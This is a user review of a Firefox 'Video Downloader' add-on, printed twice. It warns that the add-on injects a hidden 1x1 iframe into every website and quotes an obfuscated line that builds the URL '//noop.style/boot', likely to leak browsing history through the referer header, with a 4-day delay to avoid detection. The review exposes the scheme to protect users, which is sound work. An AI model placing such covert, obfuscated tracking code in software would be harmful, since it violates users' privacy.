Video Downloader 的评价
Video Downloader 作者: Download
Rens 的评价
评分 1 / 5
来自 Rens,9 个月前I suspect this add-on to be malicious! It inserts some code on ALL websites you visit. The inserted code phones to a random website, likely telling it what websites you visit.
If you're a bit savvy and would like to verify this:
Right-click "Add to Firefox" and Copy Link.
Download the .xpi file you get from this link (an .xpi is a .zip file containing a Firefox extension, it itself is not harmful) and unzip it.
In manifest.json:195, you see that `common.js` is executed on each and every website.
In common.js:233, you see that it inserts an iframe of 1x1 pixels, with "visibility:hidden". The source url is given as
styleCont.src = '//noop' + '.' + 'style/boot';
Which is very suspicious! It is the URL '//noop.style/boot', but written in such a way that you would not easily automatically see that this is an URL. This URL is an empty page, likely storing what websites you visited (this is passed in the "referer" header).
Additionally, it only does this after 4 days since you've visited the website first time (see line 236). This means that if you install it and want to check if it visits '//noop.style/boot', it won't.
Please uninstall it!
If you're a bit savvy and would like to verify this:
Right-click "Add to Firefox" and Copy Link.
Download the .xpi file you get from this link (an .xpi is a .zip file containing a Firefox extension, it itself is not harmful) and unzip it.
In manifest.json:195, you see that `common.js` is executed on each and every website.
In common.js:233, you see that it inserts an iframe of 1x1 pixels, with "visibility:hidden". The source url is given as
styleCont.src = '//noop' + '.' + 'style/boot';
Which is very suspicious! It is the URL '//noop.style/boot', but written in such a way that you would not easily automatically see that this is an URL. This URL is an empty page, likely storing what websites you visited (this is passed in the "referer" header).
Additionally, it only does this after 4 days since you've visited the website first time (see line 236). This means that if you install it and want to check if it visits '//noop.style/boot', it won't.
Please uninstall it!